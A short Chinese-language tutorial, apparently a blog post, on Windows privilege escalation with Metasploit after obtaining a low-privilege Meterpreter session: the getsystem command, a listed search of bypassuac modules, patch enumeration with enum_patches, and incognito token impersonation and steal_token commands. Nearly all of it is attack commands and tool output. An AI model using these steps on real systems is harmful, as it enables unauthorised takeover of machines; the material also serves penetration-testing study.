讲在前面:提权方法有很多种和,这里提供在利用MSF拿到低权限用户后利用MSF提权的办法,认真看好吗弟弟!!!
1.直接输入提升权限命令
meterpreter>getsystem
2.使用MSF内置bypassuac提权
MSF内置有多个bypassuac模块,原理有所不同,使用方法类似,运行后返回一个新会话后再次执行getsystem获取系统权限。
search bypassuac
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 exploit/windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass
2 exploit/windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
3 exploit/windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
4 exploit/windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key)
5 exploit/windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection)
6 exploit/windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
7 exploit/windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack)
8 exploit/windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
使用MSF的enum_patches模块,收集补丁信息,然后查找可用exploits进行提权
自行根据不同的补丁所存在的漏洞使用msf存在的脚本进行权限提升
3.令牌操作
incognito假冒令牌
use incognito #help incognito 查看帮助
list_tokens -u #查看可用的token
impersonate_token PIG\\testpig或者impersonate_token 'PIG\testpig' #假冒testpig的token,不加单引号需使用\\
execute -f cmd.exe -i -t # -t 使用假冒的token执行cmd.exe,亦可以直接输入shell进入当前token的终端
rev2self #返回原始token
steal_token窃取令牌
steal_token <pid值> #从指定进程中窃取token,先ps列出进程详细信息
drop_token #删除窃取的token